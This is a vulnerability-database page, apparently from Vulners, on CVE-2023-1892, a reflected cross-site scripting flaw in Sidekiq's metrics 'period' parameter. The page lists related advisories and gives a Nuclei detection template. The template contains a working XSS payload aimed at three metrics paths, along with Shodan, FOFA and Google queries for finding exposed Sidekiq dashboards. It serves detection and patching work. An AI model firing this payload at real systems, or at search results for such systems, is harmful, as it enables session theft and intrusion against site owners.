| Reporter | Title | Published | Views | Family All 19 |
|---|---|---|---|---|
| CVE-2023-1892 | 21 Apr 202312:37 | – | circl | |
| sidekiq 跨站脚本漏洞 | 21 Apr 202300:00 | – | cnnvd | |
| CVE-2023-1892 | 5 Apr 202300:00 | – | cve | |
| CVE-2023-1892 Cross-site Scripting (XSS) - Reflected in sidekiq/sidekiq | 5 Apr 202300:00 | – | cvelist | |
| CVE-2023-1892 | 5 Apr 202300:00 | – | debiancve | |
| Reflected XSS on Sidekiq through multiples endpoints via GET parameter "period" | 2 Apr 202321:39 | – | huntr | |
| sidekiq vulnerable to cross-site scripting | 21 Apr 202306:30 | – | github | |
| CVE-2023-1892 | 21 Apr 202305:15 | – | nvd | |
| CVE-2023-1892 Cross-site Scripting (XSS) - Reflected in sidekiq/sidekiq | 5 Apr 202300:00 | – | osv | |
| GHSA-H3R8-H5QW-4R35 sidekiq vulnerable to cross-site scripting | 21 Apr 202306:30 | – | osv |
id: CVE-2023-1892
info:
name: Sidekiq < 7.0.8 - Cross-Site Scripting
author: ritikchaddha,princechaddha
severity: critical
description: |
An XSS vulnerability on a Sidekiq admin panel can pose serious risks to the security and functionality of the system.
impact: |
Unauthenticated attackers can inject malicious JavaScript through the period parameter in Sidekiq metrics endpoints, potentially stealing administrator session cookies and accessing sensitive job queue information and worker statistics.
remediation: |
Update Sidekiq to version 7.0.8 or later that properly sanitizes the period parameter and encodes output in the metrics dashboard.
reference:
- https://huntr.com/bounties/e35e5653-c429-4fb8-94a3-cbc123ae4777
- https://github.com/sidekiq/sidekiq/commit/458fdf74176a9881478c48dc5cf0269107b22214
- https://nvd.nist.gov/vuln/detail/CVE-2023-1892
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H
cvss-score: 9.6
cve-id: CVE-2023-1892
cwe-id: CWE-79
epss-score: 0.02742
epss-percentile: 0.84365
cpe: cpe:2.3:a:contribsys:sidekiq:*:*:*:*:*:*:*:*
metadata:
max-request: 4
vendor: contribsys
product: sidekiq
shodan-query: http.title:"sidekiq"
fofa-query:
- title="Sidekiq"
- title="sidekiq"
google-query: intitle:"sidekiq"
tags: cve,cve2023,sidekiq,contribsys,xss,vuln
flow: http(1) && http(2)
http:
- method: GET
path:
- "{{BaseURL}}/queues"
matchers:
- type: word
internal: true
part: body
words:
- "Sidekiq"
- "Dashboard</a>"
condition: and
- method: GET
path:
- "{{BaseURL}}/metrics?period=%22%3E%3Cimg/src/onerror=alert(document.domain)%3E"
- "{{BaseURL}}/metrics/SanityChecksJob?period=%22%3E%3Cimg/src/onerror=alert(document.domain)%3E"
- "{{BaseURL}}/metrics/ActiveStorage::PurgeJob?period=%22%3E%3Cimg/src/onerror=alert(document.domain)%3E"
stop-at-first-match: true
matchers-condition: and
matchers:
- type: word
part: body
words:
- "<img/src/onerror=alert(document.domain)>"
- type: word
part: header
words:
- 'text/html'
- type: status
status:
- 200
# digest: 4a0a00473045022100da1442e8a6dcaaeb402cde35579f706f75ebe2c64bb00094de27cf2ce3a28ce002201323c365bdd3a87020aa51aa65b4c8f39b8cbdefe752bc319799d29a09bac7fb:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation